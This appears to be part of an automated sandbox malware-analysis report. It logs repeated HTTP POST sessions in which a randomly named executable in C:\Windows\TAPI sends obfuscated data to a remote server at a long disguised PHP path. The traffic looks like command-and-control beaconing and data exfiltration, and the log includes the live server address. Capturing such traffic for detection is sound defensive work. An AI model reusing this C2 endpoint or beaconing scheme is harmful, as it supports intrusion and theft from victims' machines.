                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49749 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:54.332926035 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2000
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:57:54.684022903 CET | 2000 | OUT | Data Raw: 5b 53 5e 5b 58 5a 55 5f 54 5b 59 5a 5b 52 57 5a 5f 54 5a 58 52 53 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [S^[XZU_T[YZ[RWZ_TZXRSPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(65$&?=+)'5\2?6V#,]$)(D3,??9#Y'$X.5
Jan 3, 2025 07:57:55.060072899 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:55.196461916 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:54 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 27 02 32 05 2e 1e 28 2c 2f 13 26 30 3d 5e 21 30 3c 5c 2f 0e 25 19 36 2f 26 02 32 28 30 1e 28 2d 25 1a 3f 0d 26 0c 23 2e 3d 52 29 30 28 5d 03 10 3a 02 3f 5b 37 59 2a 10 39 59 3a 37 3b 5a 33 37 01 04 2b 30 26 09 26 2c 29 0e 22 3e 33 57 3d 20 3e 02 24 05 24 16 3c 09 2f 5f 25 2d 20 54 0b 17 27 56 33 23 20 01 26 01 22 04 2a 24 24 5d 24 04 26 0b 23 2c 3e 57 34 17 20 18 2f 20 0b 56 27 06 08 0b 29 10 02 0b 26 04 3e 11 26 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: '2.(,/&0=^!0<\/%6/&2(0(-%?&#.=R)0(]:?[7Y*9Y:7;Z37+0&&,)">3W= >$$</_%- T'V3# &"*$$]$&#,>W4 / V')&>&+.\#(U4WP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49750 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:55.435126066 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
Jan 3, 2025 07:57:55.792983055 CET | 2516 | OUT | Data Raw: 5b 55 5e 5a 58 57 55 5a 54 5b 59 5a 5b 5e 57 5a 5f 54 5a 54 52 53 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [U^ZXWUZT[YZ[^WZ_TZTRSPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C).^!$%Z;)Y07&'/5$5W7094B3?T<#Y'$X.
Jan 3, 2025 07:57:55.801687002 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:56.012303114 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:55 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49751 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:56.450413942 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
Jan 3, 2025 07:57:56.808628082 CET | 2516 | OUT | Data Raw: 5b 5c 5e 5f 5d 5b 55 5a 54 5b 59 5a 5b 5f 57 5e 5f 5c 5a 58 52 55 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\^_][UZT[YZ[_W^_\ZXRUP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%)>2#*0R&<**[3:2="=#(Y3_+&?S(#Y'$X.
Jan 3, 2025 07:57:57.143516064 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:57.277714014 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:57 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49753 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:59.281563997 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:57:59.636800051 CET | 2516 | OUT | Data Raw: 5e 55 5b 58 5d 59 50 58 54 5b 59 5a 5b 5f 57 59 5f 50 5a 5b 52 52 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^U[X]YPXT[YZ[_WY_PZ[RRPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%<1\#:<U%Z#>;2Y'&Y9!!P#+,Y%:;$<+#Y'$X.
Jan 3, 2025 07:57:59.959013939 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:00.090744019 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:59 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49754 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:00.205971956 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2000
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49755 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:00.320075989 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:00.667983055 CET | 2516 | OUT | Data Raw: 5b 50 5b 5c 58 5e 50 58 54 5b 59 5a 5b 50 57 59 5f 54 5a 54 52 56 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P[\X^PXT[YZ[PWY_TZTRVPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?"5\/%<,>;X$7=Z&/"")P70%*#3/(S?#Y'$X.
Jan 3, 2025 07:58:01.016110897 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:01.146109104 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:00 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49756 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:02.025249958 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
Jan 3, 2025 07:58:02.371134043 CET | 2516 | OUT | Data Raw: 5e 50 5e 5b 5d 5e 50 5d 54 5b 59 5a 5b 55 57 5e 5f 54 5a 5e 52 55 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P^[]^P]T[YZ[UW^_TZ^RUP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?=*"\8S2 @(8607!Y'?&5'!4(<Z$)+$,'(#Y'$X.)
Jan 3, 2025 07:58:02.703752995 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:02.830867052 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:02 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49758 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:02.995456934 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2512
                                                                                                                                                                        Expect: 100-continue
Jan 3, 2025 07:58:03.339874029 CET | 2512 | OUT | Data Raw: 5b 53 5e 5e 58 5b 50 51 54 5b 59 5a 5b 57 57 53 5f 5d 5a 54 52 5c 50 42 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [S^^X[PQT[YZ[WWS_]ZTR\PBZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+>!!),V%*+$=Y%<95$.4+4X$7'+)#Y'$X.
Jan 3, 2025 07:58:03.675937891 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:03.803553104 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:03 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49759 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:03.941817999 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:04.292999029 CET | 2516 | OUT | Data Raw: 5b 54 5b 5f 58 5b 50 51 54 5b 59 5a 5b 56 57 58 5f 56 5a 5c 52 54 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T[_X[PQT[YZ[VWX_VZ\RTPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%<.)]59013=0&,6") ( '/'/??#Y'$X.%
Jan 3, 2025 07:58:04.617603064 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:04.746752977 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:04 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49760 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:04.904695034 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:05.261818886 CET | 2516 | OUT | Data Raw: 5b 5c 5b 5b 58 58 55 5c 54 5b 59 5a 5b 54 57 5e 5f 53 5a 5b 52 55 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\[[XXU\T[YZ[TW^_SZ[RUPIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E)-!\#);&<E>5$"&?6B"73$$0$U(#Y'$X.-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49761 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:05.346512079 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2000
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:05.699254036 CET | 2000 | OUT | Data Raw: 5b 54 5e 59 58 5d 50 50 54 5b 59 5a 5b 52 57 5d 5f 56 5a 58 52 54 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^YX]PPT[YZ[RW]_VZXRTP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C+X-^693&;)04%6"4Q#0]3(0?(#Y'$X.5
Jan 3, 2025 07:58:06.061213017 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:06.195446968 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:05 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 1e 32 15 36 13 3e 3f 01 5e 26 33 25 5f 22 1e 3b 01 2c 1e 22 08 36 3c 00 00 27 38 33 0f 3d 2e 32 07 28 0d 32 0c 34 2d 2e 0e 3c 20 28 5d 03 10 39 58 28 2e 3c 05 29 3d 36 00 2d 34 38 02 24 37 06 58 3d 33 26 09 31 5a 29 0d 36 13 09 1d 28 23 39 58 27 02 24 5b 3c 30 30 07 25 3d 20 54 0b 17 24 0e 26 20 06 07 25 38 29 58 2a 51 23 02 33 3a 0c 0b 21 2f 3d 0b 20 29 0e 16 2d 20 0f 1e 24 16 0b 57 3e 2d 2f 1d 24 39 32 13 27 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $26>?^&3%_";,"6<'83=.2(24-.< (]9X(.<)=6-48$7X=3&1Z)6(#9X'$[<00%= T$& %8)X*Q#3:!/= )- $W>-/$92';.\#(U4WP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49762 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:05.513067961 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:05.871100903 CET | 2516 | OUT | Data Raw: 5e 50 5e 51 5d 5c 50 5e 54 5b 59 5a 5b 51 57 5a 5f 56 5a 58 52 5c 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P^Q]\P^T[YZ[QWZ_VZXR\PIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&D+5<1<$>]>^3-1<6!>#,\',C'? V+9#Y'$X.9
Jan 3, 2025 07:58:06.194315910 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:06.425364971 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:06 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T
Jan 3, 2025 07:58:06.425457001 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:06 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49764 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:06.571609020 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:06.917990923 CET2516OUTData Raw: 5b 54 5e 5b 5d 5a 50 51 54 5b 59 5a 5b 53 57 5a 5f 51 5a 59 52 53 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^[]ZPQT[YZ[SWZ_QZYRSPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?"(2<>;&[%4&5P"'> ,3:7'<??#Y'$X.1
